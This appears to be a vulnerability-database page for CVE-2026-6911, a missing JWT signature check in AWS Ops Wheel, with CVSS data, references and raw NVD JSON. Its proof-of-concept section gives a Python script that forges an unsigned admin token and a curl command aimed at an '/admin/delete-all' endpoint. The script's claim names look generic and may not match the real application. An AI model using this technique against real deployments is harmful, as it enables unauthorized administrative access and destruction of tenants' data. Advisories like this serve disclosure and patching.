CVE-2026-6911

Description

Missing JWT signature verification in AWS Ops Wheel allows unauthenticated attackers to forge JWT tokens and gain unintended administrative access to the application, including the ability to read, modify, and delete all application data across tenants and manage Cognito user accounts within the deployment's User Pool, via a crafted JWT sent to the API Gateway endpoint. To remediate this issue, users should redeploy from the updated repository and ensure any forked or derivative code is patched to incorporate the new fixes.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AWS Ops Wheel (修复前的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import base64
import json
import hmac
import hashlib

# Target: AWS Ops Wheel API Gateway
# Vulnerability: Missing JWT signature verification

def create_forged_jwt():
    # 1. Header (Algorithm)
    header = {"alg": "none", "typ": "JWT"}
    header_encoded = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().replace('=', '')

    # 2. Payload (Claims) - Escalating privileges
    # Modifying the role to 'admin' to gain unauthorized access
    payload = {
        "sub": "attacker",
        "role": "admin", 
        "tenant_id": "*", # Target all tenants
        "exp": 9999999999  # Far future expiration
    }
    payload_encoded = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().replace('=', '')

    # 3. Signature
    # Since verification is missing, the signature is not required or checked.
    # We send an empty string or a dummy value.
    signature = ""

    # Construct the JWT
    jwt_token = f"{header_encoded}.{payload_encoded}.{signature}"
    return jwt_token

if __name__ == "__main__":
    token = create_forged_jwt()
    print(f"[+] Forged JWT Token: {token}")
    
    # Example usage in an HTTP request
    print("\n[+] Example Attack Command:")
    print(f"curl -H 'Authorization: Bearer {token}' https://<target-api-gateway-url>/admin/delete-all")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6911
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6911
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6911/
[4] VulDB https://vuldb.com/cve/CVE-2026-6911
[5] https://aws.amazon.com/security/security-bulletins/2026-018-aws/
[6] https://github.com/aws/aws-ops-wheel/pull/164
[7] https://github.com/aws/aws-ops-wheel/security/advisories/GHSA-v5vr-8w3c-37x2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6911", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-04-24T17:16:22.220", "lastModified": "2026-04-24T17:56:41.280", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing JWT signature verification in AWS Ops Wheel allows unauthenticated attackers to forge JWT tokens and gain unintended administrative access to the application, including the ability to read, modify, and delete all application data across tenants and manage Cognito user accounts within the deployment's User Pool, via a crafted JWT sent to the API Gateway endpoint.\n\nTo remediate this issue, users should redeploy from the updated repository and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-018-aws/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-ops-wheel/pull/164", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-ops-wheel/security/advisories/GHSA-v5vr-8w3c-37x2", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}